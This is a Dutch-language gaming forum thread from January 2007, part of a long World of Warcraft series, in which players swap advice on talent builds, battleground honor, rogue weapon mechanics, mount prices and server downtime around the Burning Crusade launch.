Het Grote World of Warcraft topic - Deel 98 Vorige deel Overzicht Volgende deel Laatste deel

Dit topic is onderdeel van een reeks. Ga naar het meest recente topic in deze reeks.

Pagina: 1 ... 9 ... 12 Laatste
Acties:
  • 5.809 views sinds 30-01-2008

Acties:
  • 0 Henk 'm!

• Plekuz
  • Registratie: September 2002
  • Laatst online: 23-07 21:42

Plekuz

available in strong mint

Sjemig, gisteren 2 uur bezig geweest met een quest in Loch Modan waarbij je drie items moet vinden, waaronder een Mo'shrogl Crystal (of hoe heten die beesten), maar niet eentje die zo'n ding dropt. Dat iets niet direct bij het eerste de beste beestje dropt, dat kan ik nog begrijpen, maar na zeker 60 van die dingen omgelegd te hebben, verwacht je toch wel op zijn minst 1 crystal voor een party member ... frusty .. (jaja, ik weet het, i aint seen nothing yet :P)

"There he goes. One of God's own prototypes. Some kind of high powered mutant never even considered for mass production. Too weird to live, and too rare to die."

Acties:
  • 0 Henk 'm!

• Thijs
  • Registratie: April 2000
  • Laatst online: 13:14
OkkE schreef op woensdag 10 januari 2007 @ 10:33:
[...]

Woei! Ik wilde ze eigenlijk weer opnieuw indelen, maar vond het zonde van mijn 10g. :)

Ik zit te denken om misschien toch de Balance tree eens te proberen, ben nu Feral. Iemand hier ervaring er mee? Op de wow-europe forums kom ik niet echt veel topics tegen met voors en tegens...

Het gaat me naast het DPSen vooral ook om weer is iets anders te doen als de hele tijd in Cat rondrennen. Ik speel alleen PvE, dus of Balance wel of niet PvP geschikt is maakt niet uit. :P
Ik ga nu ook weer terug naar balance deze patch (heb hiervoor feral geprobeerd) om dat nog even iets uitgebreider te testen. Voor questen en dergelijke vind ik feral toch fijner gezien je niet hoeft te drinken etc, tegenwoordig zelfs niet meer te healen dankzij improved LotP. Ook dat je geen last hebt van mobs die je interrupten tijdens casten (ok, je kan ook constant rooten maar is ongeveer net zo irritant :P) maakt het minder fijn. En tot slot is het moeilijk, vooral op lage levels, om goede gear te krijgen voor een balance spec. Weinig +dmg items (al helemaal in leather), terwijl je voor feral altijd wel wat kan vinden.

Edit:
Weakling schreef op woensdag 10 januari 2007 @ 11:25:
Sjemig, gisteren 2 uur bezig geweest met een quest in Loch Modan waarbij je drie items moet vinden, waaronder een Mo'shrogl Crystal (of hoe heten die beesten), maar niet eentje die zo'n ding dropt. Dat iets niet direct bij het eerste de beste beestje dropt, dat kan ik nog begrijpen, maar na zeker 60 van die dingen omgelegd te hebben, verwacht je toch wel op zijn minst 1 crystal voor een party member ... frusty .. (jaja, ik weet het, i aint seen nothing yet :P)
Deze is inderdaad zeer klote. Probeer een high-level met je mee te krijgen. Veel plezier trouwens bij de turtle quest in Hillsbrad (als je er bent begrijp je wel welke ik bedoel >:)).

[ Voor 23% gewijzigd door Thijs op 10-01-2007 11:27 ]

Acties:
  • 0 Henk 'm!

• QuarK
  • Registratie: Maart 2000
  • Laatst online: 08-07 13:40
Honor voor healers gaat prima hoor, onze guild premade healers hebben niets te klagen. Gaat net zo hard als dps'ers.

Acties:
  • 0 Henk 'm!

• sabriel
  • Registratie: Augustus 2006
  • Laatst online: 13-01-2021
De Gesnaakte schreef op woensdag 10 januari 2007 @ 11:24:
[...]
wat ik me afvraag: zouden de mensen die al een epic mount hebben het verschil in gold terugkrijgen?
WoW doet niets met terugwerkende kracht, dus antwoord is nee, je krijgt geen geld terug

WoW Argent Dawn alliance :lvl60 Sabriell (Innovation)

Acties:
  • 0 Henk 'm!

• redfoxert
  • Registratie: December 2000
  • Niet online
[...]
wat ik me afvraag: zouden de mensen die al een epic mount hebben het verschil in gold terugkrijgen?
Natuurlijk niet ! Ik kreeg mn geld ook niet terug toen ik een Kodo gekocht had terwijl ik allang een Epic mount met skill gekocht had. Dit na de vorige verandering t.a.v. mounts.

https://discord.com/invite/tweakers

Acties:
  • 0 Henk 'm!

• Kevinp
  • Registratie: Juni 2001
  • Laatst online: 12-09 11:04
[...]

ik dus ook , ik had eindelijk mn 810 bij elkaar toen ik in de beta zag dat het mar 540 zou gaan kosten, bijna vorige week die epic mount gekocht,

gelukkig net op tijd gezien dat het goedkoper word

nee, iedereen die een bv twee epic mounts had, kreeg het verschil ook niet terug(wat duidelijk nog meer was).

d'r is maar één ding in het leven wat moet, en dat is dood gaan.

Acties:
  • 0 Henk 'm!

• Scorchor
  • Registratie: Februari 2001
  • Laatst online: 28-08 12:43
Kevinp schreef op woensdag 10 januari 2007 @ 11:32:
[...]

nee, iedereen die een bv twee epic mounts had, kreeg het verschil ook niet terug(wat duidelijk nog meer was).
dan ben ik heel blij dat ik vorige week niet die impulsieve aankoop gedaan heb :o

Acties:
  • 0 Henk 'm!

• Rochette
  • Registratie: Oktober 2006
  • Laatst online: 07-05-2022
Thijs schreef op woensdag 10 januari 2007 @ 11:26:
[...]

[...]

Deze is inderdaad zeer klote. Probeer een high-level met je mee te krijgen. Veel plezier trouwens bij de turtle quest in Hillsbrad (als je er bent begrijp je wel welke ik bedoel >:)).
De Turtle quest valt wel mee, mits je eerst naar 1000 needles gaat. Daar is een quest waar je scales van turtles moet verzamelen (op de racestrack). Het turtle meat kun je daar looten. Gewoon effe op de bank zetten en je kan in Hillsbrad de quest pakken en meteen inleveren. Over easy XP gesproken ..
:)

A dead heealer can't heal you.

Acties:
  • 0 Henk 'm!

Verwijderd

QuarK schreef op woensdag 10 januari 2007 @ 11:27:
Honor voor healers gaat prima hoor, onze guild premade healers hebben niets te klagen. Gaat net zo hard als dps'ers.
Leg mij dan even uit wat ik fout doe? Heal vooral players in combat (Je krijgt geen honor als je een player healt die out of combat is uiteraard) en sta 9 van de 10 keer bovenaan betreffende healing done. :? Doe vooral AV en die wint aliance ook bijna altijd.

Misschien is het wel gevoelsmatig dan O-)

Acties:
  • 0 Henk 'm!

• QuarK
Tja, je moet ook geen AV doen voor honor. AB is zoveel beter voor honor. Wij hebben in onze 3 scout groups in AB altijd 1 healer die de dps'ers healed.
Zij profiteren lekker mee van onze kills, wij kunnen zoveel sneller killen en taggen doordat zij ons in leven houden. Daardoor hebben we ook een snelle overwinning -> nog meer honor.

Acties:
  • 0 Henk 'm!

• Kevinp
Verwijderd schreef op woensdag 10 januari 2007 @ 11:36:
[...]

Leg mij dan even uit wat ik fout doe? Heal vooral players in combat (Je krijgt geen honor als je een player healt die out of combat is uiteraard) en sta 9 van de 10 keer bovenaan betreffende healing done. :? Doe vooral AV en die wint aliance ook bijna altijd.

Misschien is het wel gevoelsmatig dan O-)
Iedereen in een raid groep(wat moet) die dicht genoeg bij een kill is krijgt honor. Die range is behoorlijk, misschein kan het zijn dat je een mage healed die op max afstand staat te nuken, en jij weer op max afstand staat zou het misschien kunnen. Maar volgens mij raak je dan in combat en krijg je gewoon honor.

Acties:
  • 0 Henk 'm!

• Rochette
  • Registratie: Oktober 2006
  • Laatst online: 07-05-2022
Verwijderd schreef op dinsdag 09 januari 2007 @ 16:24:
Zou het nog echt leuk zijn om een priest te beginnen met TBC, of zijn de andere heal classes gewoon veel beter in balans na al die patches? Een lock lijkt me grote fun, maar helaas ik wil een Draenei.
Wat denken de priests hier? :)
Ik ga het wel doen. TBC is een heel nieuw deel van WoW en ik denk dat het wel mee valt met het out healen van de priest. We blijven de beste healers in de game.
Ik heb mijn huidige priest 3x van build veranderd om het een en ander uit te proberen.
Ben nu weer terug op mijn oude build en die bevalt toch weer prima. Niks geen lvl 70 talents. Gewoon 21/30/0.

Iemand heeft hier een tijdje geleden geschreven: "Vergelijk de nieuwe spells en talents niet met de huidige spels en talents. Het zijn spels en talents voor lvl 60+", en dat is nog niemand.
Gewoon doen dus, die priest rollen. Blijft de mooiste / leukste classe om te spelen.
:)

A dead heealer can't heal you.

Acties:
  • 0 Henk 'm!

• Svenneh
  • Registratie: Maart 2004
  • Laatst online: 08-09 21:34
Zo,

Na nog steeds geen mail terug te hebben gehad van Bart Smit heb ik mijn preorder gecancelt en heb ik gewoon bij Bol.com gereserveerd :).

Ik las hier ergens dat ze nog steeds niet door de voorraad heen zijn dus dat moet wel goed komen

Acties:
  • 0 Henk 'm!

• remcio
  • Registratie: Juni 2005
  • Laatst online: 24-08 13:48
wat vinden jullie eigenlijk van deze fire build ?
http://talentcalculator.m...1LTU7MzYtMTsxNzM0LTV8fA==

Acties:
  • 0 Henk 'm!

• MrVegeta
  • Laatst online: 11-09 20:46

MrVegeta

! Dolf is rechtvaardig !

Haha 1 server up. Wachttijd van 2000 chars :p

Geeft steekhoudelijke argumenten terwijl hij niet weet waar het over gaat. BlizzBoys, HD casts van StarCraft II gemaakt door Tweakers! Het begint, Zombiepocalyps

Acties:
  • 0 Henk 'm!

• Bosmonster
  • Laatst online: 10-09 08:45
Svenneh schreef op woensdag 10 januari 2007 @ 11:46:
Zo,

Na nog steeds geen mail terug te hebben gehad van Bart Smit heb ik mijn preorder gecancelt en heb ik gewoon bij Bol.com gereserveerd :).

Ik las hier ergens dat ze nog steeds niet door de voorraad heen zijn dus dat moet wel goed komen
De gewone versie zal wel ruim voorradig zijn hoor, overal. Blizzard is niet gek :)

Collector's Editions wordt wat lastiger. Ik heb er een preorder van staan, maar misschien verkoop ik hem maar (heb ook een CE van het origineel).

Acties:
  • 0 Henk 'm!

Verwijderd

41 fire zonder DB?

Acties:
  • 0 Henk 'm!

Verwijderd

QuarK schreef op woensdag 10 januari 2007 @ 11:43:
Tja, je moet ook geen AV doen voor honor. AB is zoveel beter voor honor. Wij hebben in onze 3 scout groups in AB altijd 1 healer die de dps'ers healed.
Zij profiteren lekker mee van onze kills, wij kunnen zoveel sneller killen en taggen doordat zij ons in leven houden. Daardoor hebben we ook een snelle overwinning -> nog meer honor.
Ik was in de veronderstelling dat je voor iedere BG de zelfde hoeveelheid honor krijgt.... 8)7

AB it will be....

Acties:
  • 0 Henk 'm!

• remcio
waarschijnelijk ff 1 punt in dragons beath weghalen dan heb ik hem wel

Acties:
  • 0 Henk 'm!

• MrVegeta

MrVegeta

! Dolf is rechtvaardig !

Verwijderd schreef op woensdag 10 januari 2007 @ 11:50:
[...]

Ik was in de veronderstelling dat je voor iedere BG de zelfde hoeveelheid honor krijgt.... 8)7

AB it will be....
Mjah, je krijgt overal zo'n 200 honor, give or take. Alleen duurd een AV potje meestal langer dan 30 min en AB potje nooit veel vaker dan 20 min. Meestal 15 oid.

Probleem met AV is is dat niemand goed weet waardoor je veel Bonus Honor kan krijgen. Als je met een Fixed AV in gaat.. dan gaat je Honor wel frikking hard!

Geeft steekhoudelijke argumenten terwijl hij niet weet waar het over gaat. BlizzBoys, HD casts van StarCraft II gemaakt door Tweakers! Het begint, Zombiepocalyps

Acties:
  • 0 Henk 'm!

• Viggen
  • Registratie: December 2003
  • Niet online
mja, als alliance zijnde zonder premade group is in onze battlegroup AV beter dan AB hoor :P

AV krijg ik een hoop meer (bonus)honor, duurt ongeveer even lang (tenzij we in AB premade tegenkomen, dan duurt AB korter en hebben we 0 (bonus)honor :{ :P)

als je AB wint krijg je 120-140 honor, verlies je kansloos krijg je 0... in AV weten ze bij ons meestal wel wat je moet doen en ook al verlies je dan, dan heb je nog wel 200+ honor te pakken

Acties:
  • 0 Henk 'm!

• Kevinp
MrVegeta schreef op woensdag 10 januari 2007 @ 11:53:
[...]

Mjah, je krijgt overal zo'n 200 honor, give or take. Alleen duurd een AV potje meestal langer dan 30 min en AB potje nooit veel vaker dan 20 min. Meestal 15 oid.

Probleem met AV is is dat niemand goed weet waardoor je veel Bonus Honor kan krijgen. Als je met een Fixed AV in gaat.. dan gaat je Honor wel frikking hard!
Alleen een fixed av is lastig(het kan wel trouwens als je allemaal dezelfde tijd joined)

Acties:
  • 0 Henk 'm!

• QuarK
Onze goede AB potjes duren max 5-10 minuten. Een snelle 0-5 kost 5 minuten, als je weerstand hebt iets langer. Een voor mij als rogue heb ik veel meer kills in AB dan in AV.

Acties:
  • 0 Henk 'm!

• MrVegeta

MrVegeta

! Dolf is rechtvaardig !

Kevinp schreef op woensdag 10 januari 2007 @ 11:56:
[...]

Alleen een fixed av is lastig(het kan wel trouwens als je allemaal dezelfde tijd joined)
Ik verwijs je naar "prefix av enabler" op curse-gaming.com. Daarmee moet het wel heel aardig lukken hoor. Weet niet hoe legaal het is en of die nog werkt na de patch van vandaag.

Ik ga trouwens van pugs uit hé. Als je met een goede Fix AB in duikt dan gaat dat opzich nog harder per uur dan een Fixed AV.

[ Voor 14% gewijzigd door MrVegeta op 10-01-2007 11:58 ]

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
QuarK schreef op woensdag 10 januari 2007 @ 11:56:
Onze goede AB potjes duren max 5-10 minuten. Een snelle 0-5 kost 5 minuten, als je weerstand hebt iets langer. Een voor mij als rogue heb ik veel meer kills in AB dan in AV.
mja, met premade dan lijkt me?

als je pug vs pug doet dan kan 't wel ff duren (is meestal 3vs2 en dan duurt 't ff voordat je bij 2000 bent)

Acties:
  • 0 Henk 'm!

• thewizard2006
  • Registratie: Januari 2006
  • Laatst online: 08-08 14:23
http://talentcalculator.m...1OzE3MzUtMXw2MToxNjQ5LTN8

zou eerder dit doen, arcane heeft niet echt veel boeiends daar zitten. Alsje toch fire gaat, doe het dan goed :D. Weet ook niet echt of master of elements wel zo goed is. crit van fireball (400mana) -> 30% = 120 refund. Daar kan je vrij weinig mee.
misschien dan deze voor wat meer armor etc
http://talentcalculator.m...xfDYxOjcwLTI7MTY0OS0zfA==

We've got simultaneous epidemics of obesity and starvation

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
weer update van blue post:
10/01 Update:
We are still working on bringing all the realms back up and will let you know when we have more information.
oh really? :P

ben wel blij dat ze nu steeds ff updaten... vorige keer duurde 't uren voordat er ook maar enige reactie kwam

[ Voor 23% gewijzigd door Viggen op 10-01-2007 12:01 ]

Acties:
  • 0 Henk 'm!

• witchdoc
  • Registratie: Juni 2000
  • Laatst online: 02-09 15:54
Verwijderd schreef op woensdag 10 januari 2007 @ 10:52:
Hehe bedankt voor de bevestiging. Ik snapte het eerst ook niet echt totdat ik me nieuwe dagger won. Die was 1.50 en ik had gehoord dat daggers sneller zijn dan swords. Dus het enige wat ik kan bedenken was dan 1x in een seconde. beadnkt :)
ZEER kort door de bocht en mogelijk foutieve redenering.

Voor rogues: zowel dagger- als swordspeed zijn genormaliseerd. Dat wil zeggen dat al onze instant SPECIAL attacks (en we hebben alleen instant specials) volgens een fixed speed werken. Daggers op 1.7 spd en swords op 2.4 spd.

Je special attacks (niet je normale witte dmg dus) worden enkel van je mainhand gedaan. Offhand doet enkel poison procs en white dmg.

Je main hand echter heeft dus baat bij een wapen met een zo hoog mogelijk damage range (= NIET dps!). Wapens met hoge dmg range zijn in praktijk altijd traag omdat anders de dps te hoog wordt.
Waarom hoge dmg range? Omdat die toch wordt verrekend aan die 1.7 respectievelijk 2.4 spd dus snelle wapens (met lagere dmg range) geven je dus een verlies van special attack damage.

Waarom dan niet gewoon swords (hebben veel hogere dmg range ivm daggers) gebruiken? Omdat swords niet kunnen mutilaten of backstabben uiteraard. Die dagger attacks doen meer dmg per swing dan zowel sinister strike als hemorage, de enige 2 main attacks die een sword kan halen.
Da's gelijk de reden waarom je never ever zou mogen sinister striken met daggers.

Je offhand wil je weer erg snel omdat je dan meer poison applied. Verder is enkel dps belangrijk voor je offhand wapen. Damage range doet er niet toe hier.

Acties:
  • 0 Henk 'm!

• shag-me
  • Registratie: April 2002
  • Laatst online: 01-07 22:23

shag-me

-n0n3-

Jullie praten wel allemaal in vaktaal zeg... Ben nu level 13 Dwarve Paladin, In Tarren Mill (pvp), vind het echt een geweldig spel.. Burning crusade kopen, heeft dat nou alleen zin als je level 50+ bent?
Iemand nog handige tips/strategieen? PVP lijkt me echt leuk, sommige quests gaan vrij langzaam (heen en weer lopen/vliegen etc) Alleen moet natuurlijk nog wel flink levelen... Heb als wapen een dikke 2 hand bijl gekozen..

[ Voor 35% gewijzigd door shag-me op 10-01-2007 12:05 ]

pentium 4 2000@2520 Geforce 4 ti 4200 [XfX] 512mb Corsair 9953 3d benchmarkz

Acties:
  • 0 Henk 'm!

• QuarK
Viggen schreef op woensdag 10 januari 2007 @ 11:58:
[...]

als je pug vs pug doet dan kan 't wel ff duren (is meestal 3vs2 en dan duurt 't ff voordat je bij 2000 bent)
Ja idd, met premade. Horde heeft bij ons instant queues dus joinen met premade is echt easy.
Soms wel sneu hoor, dan hebben de allies 10min of langer moeten wachten voor een AB potje, komen ze er met 0 honor uit..

Acties:
  • 0 Henk 'm!

• remcio
thewizard2006 schreef op woensdag 10 januari 2007 @ 11:59:
[...]

http://talentcalculator.m...1OzE3MzUtMXw2MToxNjQ5LTN8

zou eerder dit doen, arcane heeft niet echt veel boeiends daar zitten. Alsje toch fire gaat, doe het dan goed :D. Weet ook niet echt of master of elements wel zo goed is. crit van fireball (400mana) -> 30% = 120 refund. Daar kan je vrij weinig mee.
misschien dan deze voor wat meer armor etc
http://talentcalculator.m...xfDYxOjcwLTI7MTY0OS0zfA==
ik ga denk ik toch voor deze [url]http://talentcalculator.m...1OzE3MzUtMXw2MToxNjQ5LTN8[/url]

de eerste met master of element

Acties:
  • 0 Henk 'm!

Verwijderd

Get off damn Vek'nilash, kan niet eens mn eigen realm op :p

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
QuarK schreef op woensdag 10 januari 2007 @ 12:02:
[...]

Ja idd, met premade. Horde heeft bij ons instant queues dus joinen met premade is echt easy.
Soms wel sneu hoor, dan hebben de allies 10min of langer moeten wachten voor een AB potje, komen ze er met 0 honor uit..
ik ben dan dus zo'n sneue alliance pug ;) :P

al is bij ons queue bijna instant (minder dan 2 min) is toch jammer dat je dan helemaal nix krijgt (mja, mark... maar daar heb ik er al 100 van, gief honor :( :P)

Acties:
  • 0 Henk 'm!

• Hydra
  • Registratie: September 2000
  • Laatst online: 21-08 17:09
Lifelogger schreef op woensdag 10 januari 2007 @ 11:22:
Honor in BG schiet inderdaad niet op. Heb je helemaal gelijk in en daar was ik ook al achter.
Haal iets van 8k op een zaterdag, 2500 als ik alleen 's avonds PvP. Dan vind ik de PvP rewards nog best 'goedkoop' eigenlijk als je ziet hoe lang je moet raiden voor een tier 2 set.
Viggen schreef op woensdag 10 januari 2007 @ 11:58:

25 minuten :) Tenzij je veel nodes verliest steeds, dan duurt het nog langer. 4-1 is ongeveer 15 minuten. 5-0 duurt minimaal 5 minuten, sneller dan dat kan geloof ik niet. Maar van die 5 minuten moet je wel de 2 min warming-up vanaf trekken, eigenlijk pwn je dan gewoon de tegenstander in 3 min :)

[ Voor 41% gewijzigd door Hydra op 10-01-2007 12:11 ]

https://niels.nu

Acties:
  • 0 Henk 'm!

• Proqzor
  • Registratie: Juni 2004
  • Laatst online: 04-08 21:37
poohbeer schreef op woensdag 10 januari 2007 @ 12:01:
[...]

Voor rogues: zowel dagger- als swordspeed zijn genormaliseerd. Dat wil zeggen dat al onze instant SPECIAL attacks (en we hebben alleen instant specials) volgens een fixed speed werken. Daggers op 1.7 spd en swords op 2.4 spd.

Je special attacks (niet je normale witte dmg dus) worden enkel van je mainhand gedaan. Offhand doet enkel poison procs en white dmg.

Je main hand echter heeft dus baat bij een wapen met een zo hoog mogelijk damage range (= NIET dps!). Wapens met hoge dmg range zijn in praktijk altijd traag omdat anders de dps te hoog wordt.
Waarom hoge dmg range? Omdat die toch wordt verrekend aan die 1.7 respectievelijk 2.4 spd dus snelle wapens (met lagere dmg range) geven je dus een verlies van special attack damage.

Waarom dan niet gewoon swords (hebben veel hogere dmg range ivm daggers) gebruiken? Omdat swords niet kunnen mutilaten of backstabben uiteraard. Die dagger attacks doen meer dmg per swing dan zowel sinister strike als hemorage, de enige 2 main attacks die een sword kan halen.
Da's gelijk de reden waarom je never ever zou mogen sinister striken met daggers.

Je offhand wil je weer erg snel omdat je dan meer poison applied. Verder is enkel dps belangrijk voor je offhand wapen. Damage range doet er niet toe hier.
dat laatste gaat alleen niet op voor mutilate rogues. Die willen zowel een langzame dagger in mainhand als in OH. Omdat je zowel dmg doet met je main als oh met die attack.

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
gezellig druk @ Vek'nilash btw:

Afbeeldingslocatie: http://www.xs4all.nl/~spmf/wow/lol.jpg

lol :P

Acties:
  • 0 Henk 'm!

• Yokozuna
  • Registratie: Januari 2001
  • Laatst online: 19-05 15:55
verhaal over weaponspeed normalisation
Je info is niet compleet. De damage range op je wapen voor special attacks is niet genormaliseerd. Alleen extra damage toegevoegd aan je special attacks door attack power is genormaliseerd, niet de standaard damagerange op je wapen, die blijft zoals die is.

Versimpeld voorbeeld
Als je bijvoorbeeld een 2.7speed sword hebt met een damagerange van 100-200dmg en sinister strike doet met 800AP, dan krijg je niet een gemiddelde dmg van

150 (gemiddelde van 100 en 200) + (800/14x2.7=) 154 = 304dmg

maar

150 (gemiddelde van 100 en 200) + (800/14x2.4=) 154 = 287dmg

Conclusie blijft hetzelfde: voor je mainhand is een hogere damage range nog steeds beter ook naar de attack power normalisation. Je offhand wil je gewoon zo snel mogelijk hebben voor veel poison procs of voor veel energy regeneration (Combat Potency). Sword spec werkt niet voor je offhand, dus als je een sword rogue bent kun je gewoon een snelle dagger pakken voor je offhand.

[ Voor 71% gewijzigd door Yokozuna op 10-01-2007 12:18 ]

Acties:
  • 0 Henk 'm!

• Hydra
Viggen schreef op woensdag 10 januari 2007 @ 12:09:
gezellig druk @ Vek'nilash btw:

[afbeelding]

lol :P
Oh....Als ik een alliance mage had op die server... :P

Oh nee, starters area, helaas :(

Acties:
  • 0 Henk 'm!

• witchdoc
[...]

10mins? daar zou'k nog voor tekenen.
Is bij ons vaak 20 tot 30 minuten voor AB. Meteen ook de reden waarom Alliance vaak met een man of 8 moet starten volgens mij. Mensen in queue worden het wachten beu, gaan even afk en missen zo hun window om te joinen. Nog eens extra voordeel voor horde dus want dat betekend dat alle bases behalve stables verloren zijn (je krijgt echt never nooit >50% van een pug naar 1 base bij start).
Yokozuna schreef op woensdag 10 januari 2007 @ 12:11:
[...]

Je info is niet compleet. De damage range op je wapen voor special attacks is niet genormaliseerd. Alleen extra damage toegevoegd aan je special attacks door attack power is genormaliseerd, niet de standaard damagerange op je wapen, die blijft zoals die is.
Mijn uitleg is aardig compleet. Ik heb't over special attacks, je white dmg komt daar uiteraard nog gewoon bij.

[ Voor 40% gewijzigd door witchdoc op 10-01-2007 12:15 ]

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
Hydra schreef op woensdag 10 januari 2007 @ 12:12:
[...]

Oh....Als ik een alliance mage had op die server... :P

Oh nee, starters area, helaas :(
echt te druk daar :P

en heb nog nooit zoveel spam gezien... per seconde schiet chatschermpje 2-3 keer vol ofzo :? :P

Acties:
  • 0 Henk 'm!

Verwijderd

[...]

Alliance word zowieso vaak ge-owned in AB, tenzij het premade tegen premade is dan.

Ik vraag me trouwens af hoe deze verschillen onstaan; AV --> Alliance wint 70%-80%
AB --> Horde wint 90%

Dit verschilt misschien per battlegroup maar in AB heb ik altijd het gevoel alsof het 40 tegen 15 is....
Is het een lack aan strategy/teamplay of zijn de battlegrounds zo ontworpen dat alliance bijvoorbeeld voordelen heeft in AV en Horde in AB?

Alliance heeft misschien als voordeel de bridge in AV, deze is relatief moeilijk over te komen als er goed gedefend wordt. Alliance kan bij frostwolf vrij gemakkelijk tussen de torens over het smalle pad naar Drek toe. Defense aan Horde zijde is zowieso vaak nihil al moet ik zeggen dat het de laatste weken meer Hordes aan het defenden geslagen zijn lijkt het.

Acties:
  • 0 Henk 'm!

• Yokozuna
Mijn uitleg is aardig compleet. Ik heb't over special attacks, je white dmg komt daar uiteraard nog gewoon bij.
Je info is niet compleet. De attack speed normalisation geldt alleen voor attack power. Attack power komt nergens aan bod in je post. Bovendien geldt de normalisation ook voor maces en fist weapons (ook 2.4speed), jij zei alleen daggers+swords.

Voor de mensen thuis:

Versimpeld voorbeeld
Als je bijvoorbeeld een 2.7speed sword hebt met een damagerange van 100-200dmg en sinister strike doet met 800AP, dan is deze 800AP niet vermenigvuldigd door 2.7 (de weaponspeed) maar 2.4 (de standaard waarde waarmee AP nu wordt vermenigvuldig voor alle rogue wapens behalve daggers) dan krijg je niet een gemiddelde dmg van

150 (gemiddelde van 100 en 200) + (800/14x2.7=) 154 = 304dmg

maar

150 (gemiddelde van 100 en 200) + (800/14x2.4=) 154 = 287dmg

Conclusie blijft hetzelfde: voor je mainhand is een hogere damage range nog steeds beter omdat dan het eerste getal in deze berekeningen (150) hoger is. Je offhand wil je gewoon zo snel mogelijk hebben voor veel poison procs of voor veel energy regeneration (Combat Potency). Sword spec werkt niet voor je offhand, dus als je een sword rogue bent kun je gewoon een snelle dagger pakken voor je offhand.

[ Voor 67% gewijzigd door Yokozuna op 10-01-2007 12:23 ]

Acties:
  • 0 Henk 'm!

• redfoxert
  • Niet online
Iemand hier die overigens in AV alle zooi inlevert voor reputation voor Cross Faction mounts ? Gaat best hard nog.

M'n vriendin (de aanstichtster van de bunny-hype) is inmiddels bijna Exalted met Silvermoon City en zal de eerste dag van TBC een Epic crossfaction Blood Elf mount hebben :D

Acties:
  • 0 Henk 'm!

Verwijderd

De blauwe pvp rewards zijn trouwens NIET goedkoper geworden atm.

Acties:
  • 0 Henk 'm!

Verwijderd

redfoxert schreef op woensdag 10 januari 2007 @ 12:19:
Iemand hier die overigens in AV alle zooi inlevert voor reputation voor Cross Faction mounts ? Gaat best hard nog.

M'n vriendin (de aanstichtster van de bunny-hype) is inmiddels bijna Exalted met Silvermoon City en zal de eerste dag van TBC een Epic crossfaction Blood Elf mount hebben :D
Doe ik ook ;)\
Maar kan een orc wel op zo'n BE mount rijden?

Een tauren lijkt me niet

-edit-

En met dat spul inleveren bedoel je toch van de scraps?
In de grot zit er een npc en buiten bij de forge.
En kan je dat spul maar bij 1 basis inleveren? (heel vaak wordt die basis van ons overgenomen)

(als er meer zijn laat het maar weten)

[ Voor 20% gewijzigd door Verwijderd op 10-01-2007 12:25 ]

Acties:
  • 0 Henk 'm!

• Thijs
  • Registratie: April 2000
  • Laatst online: 13:14
shag-me schreef op woensdag 10 januari 2007 @ 12:02:
Jullie praten wel allemaal in vaktaal zeg... Ben nu level 13 Dwarve Paladin, In Tarren Mill (pvp), vind het echt een geweldig spel.. Burning crusade kopen, heeft dat nou alleen zin als je level 50+ bent?
Iemand nog handige tips/strategieen? PVP lijkt me echt leuk, sommige quests gaan vrij langzaam (heen en weer lopen/vliegen etc) Alleen moet natuurlijk nog wel flink levelen... Heb als wapen een dikke 2 hand bijl gekozen..
Als je nu TBC koopt, kan je een Dranei Shaman of Blood Elf Paladin maken (zullen er trouwens wel heel veel van zijn). Die zijn nogal gewild gezien alliance nu geen shamans heeft en horde geen paladins. Dus ja, het heeft wel zin om het te kopen, mits je een dranei of blood elf maakt (enige extra content voor beneden de lvl 60). Anders zou ik gewoon even wachten, misschien dat je het spel wel beu bent over 10 levels. :P

Acties:
  • 0 Henk 'm!

• Tranzity
  • Niet online
Een nieuwe build voor m'n paladin:
http://www.wowhead.com/?talent=qVEhMxu0xoxZVf0z (40/0/11)
Alleen voor battleground, main damage Shock en SoR, moet wel lukken met 400 basis spelldamage.
Ik was hiervoor full ret (9/0/43), maar met 2.0.3 ben ik bang dat de damage echt flink omlaag is gegaan (Vengeance nerf), veel gewhine op de wow fora :)

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
Verwijderd schreef op woensdag 10 januari 2007 @ 12:22:
[...]

Doe ik ook ;)\

Een tauren lijkt me niet

-edit-

En kan je dat spul maar bij 1 basis inleveren? (heel vaak wordt die basis van ons overgenomen)

Swift Purple Hawkstrider
Binds when picked up
Races: Or, Sc, Tr, Be
Requires Level 60
Requires Riding (150)

wel orc, geen tauren dus

plaatjes zijn te vinden @ http://www.wowwiki.com/Hawkstrider (voor de geïnteresseerden :P)

[ Voor 7% gewijzigd door Viggen op 10-01-2007 12:31 ]

Acties:
  • 0 Henk 'm!

• redfoxert
  • Niet online
[...]

Doe ik ook ;)\

Een tauren lijkt me niet
Orc lijkt me wel ja, die kunnen ook op de Troll mounts rijden, en op de Undead. Ze speelt zelf een Undead rogue atm waar ze het mee doet en die begonnen sowieso al met een extra headstart (Friendly ipv Neutral). Silvermoon City ligt ook het dichtst bij de Undead regionen dus dat zal uberhaubt geen probleem zijn gok ik zo.

Acties:
  • 0 Henk 'm!

Verwijderd

Thijs schreef op woensdag 10 januari 2007 @ 12:23:
[...]

Als je nu TBC koopt, kan je een Dranei Shaman of Blood Elf Paladin maken (zullen er trouwens wel heel veel van zijn). Die zijn nogal gewild gezien alliance nu geen shamans heeft en horde geen paladins. Dus ja, het heeft wel zin om het te kopen, mits je een dranei of blood elf maakt (enige extra content voor beneden de lvl 60). Anders zou ik gewoon even wachten, misschien dat je het spel wel beu bent over 10 levels. :P
Hordes hebben toch een broertje dood aan Bubbleboys? :+

Acties:
  • 0 Henk 'm!

• Hydra
Verwijderd schreef op woensdag 10 januari 2007 @ 12:18:
Dit verschilt misschien per battlegroup maar in AB heb ik altijd het gevoel alsof het 40 tegen 15 is....
Is het een lack aan strategy/teamplay of zijn de battlegrounds zo ontworpen dat alliance bijvoorbeeld voordelen heeft in AV en Horde in AB?
In AB en WSG zijn er geen grote voordelen aan beide zijden. Ik doe eigenlijk vooral AB in een premade, en we merken gewoon dat alliance enorm dom speelt. De enige keer dat we verloren hebben was tegen een andere tier 2/3 premade met 8 paladins in de groep. Daar kun je gewoon niet tegenop DPSen. En toen hadden ze nog maar 3 bases.

Zuigt wel. Krijg je 100 honour voor een potje van 25 minuten in plaats van 200 voor een potje van 5 ;)

